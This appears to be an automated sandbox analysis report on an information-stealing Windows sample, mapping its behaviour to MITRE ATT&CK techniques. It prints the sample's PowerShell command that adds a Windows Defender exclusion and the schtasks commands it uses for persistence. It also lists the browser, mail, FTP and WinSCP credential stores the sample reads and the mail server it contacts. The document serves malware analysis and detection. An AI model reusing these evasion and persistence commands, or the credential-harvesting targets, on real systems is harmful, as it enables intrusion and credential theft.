                    Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99866
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99421
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99286
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99154
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98718
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98499
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98390
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98171
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97950
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97842
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97624
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97405
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97296
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97187
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96968
                    Source: RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                    Source: joUXSCpr.exe, 00000009.00000002.1490355465.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`pS
                    Source: RegSvcs.exe, 00000008.00000002.1477888050.0000000006510000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1044008
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EDC008
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp"
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Queries volume information: C:\Users\user\Desktop\SMBKT-20242005.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Queries volume information: C:\Users\user\AppData\Roaming\joUXSCpr.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match; file source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e1cc78.4.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e57898.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.2663210822.000000000310F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000008.00000002.1473242520.000000000338C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000008.00000002.1473242520.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: Process Memory Space: SMBKT-20242005.exe PID: 7376, type: MEMORYSTR
Source: Yara match; file source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR
Source: Yara match; file source: Process Memory Space: RegSvcs.exe PID: 8092, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match; file source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e1cc78.4.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e57898.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000008.00000002.1473242520.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: Process Memory Space: SMBKT-20242005.exe PID: 7376, type: MEMORYSTR
Source: Yara match; file source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR
Source: Yara match; file source: Process Memory Space: RegSvcs.exe PID: 8092, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match; file source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e1cc78.4.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e57898.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.2663210822.000000000310F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000008.00000002.1473242520.000000000338C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000008.00000002.1473242520.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: Process Memory Space: SMBKT-20242005.exe PID: 7376, type: MEMORYSTR
Source: Yara match; file source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR
Source: Yara match; file source: Process Memory Space: RegSvcs.exe PID: 8092, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic column; the numbers in front of a technique are the match counts shown in the original matrix, techniques without a number are unmatched filler cells of the matrix):

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise
Execution: 121 Windows Management Instrumentation | 1 Scheduled Task/Job | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job
Persistence: 1 DLL Side-Loading | 1 Scheduled Task/Job | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading | 311 Process Injection | 1 Scheduled Task/Job | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools | 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 12 Software Packing | 1 DLL Side-Loading | 1 Masquerading | 141 Virtualization/Sandbox Evasion | 311 Process Injection
Credential Access: 2 OS Credential Dumping | 1 Input Capture | 1 Credentials in Registry | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem
Discovery: 1 File and Directory Discovery | 24 System Information Discovery | 211 Security Software Discovery | 1 Process Discovery | 141 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 System Network Configuration Discovery | System Owner/User Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services
Collection: 11 Archive Collected Data | 2 Data from Local System | 1 Email Collection | 1 Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking
Command and Control: 1 Ingress Tool Transfer | 11 Encrypted Channel | 1 Non-Standard Port | 2 Non-Application Layer Protocol | 23 Application Layer Protocol | Multiband Communication | Commonly Used Port | Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph (text rendering of the graph; node numbers and layout dropped)

Behavior Graph ID: 1444949; Sample: SMBKT-20242005.exe; Startdate: 21/05/2024; Architecture: WINDOWS; Score: 100
DNS/IP: mail.stilbo.eu; api.ipify.org
Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 8 other signatures

• SMBKT-20242005.exe started
  • Dropped: C:\Users\user\AppData\Roaming\joUXSCpr.exe (PE32); C:\Users\user\AppData\Local\Temp\tmp6AB.tmp (XML)
  • Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
  • RegSvcs.exe started; network: mail.stilbo.eu 212.44.102.65 (ports 49712, 49716, 587; DHH-ASSI, Slovenia); api.ipify.org 104.26.13.205 (ports 443, 49710, 49713; CLOUDFLARENETUS, United States)
  • powershell.exe started; signature: Loading BitLocker PowerShell Module; started conhost.exe and WmiPrvSE.exe
  • RegSvcs.exe started; signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
  • schtasks.exe started; started conhost.exe
• joUXSCpr.exe started
  • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  • RegSvcs.exe started; signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
  • schtasks.exe started; started conhost.exe
  • RegSvcs.exe started (two further instances, no signatures attached in the graph)

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label
SMBKT-20242005.exe | 37% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal
SMBKT-20242005.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\joUXSCpr.exe | 100% | Joe Sandbox ML |
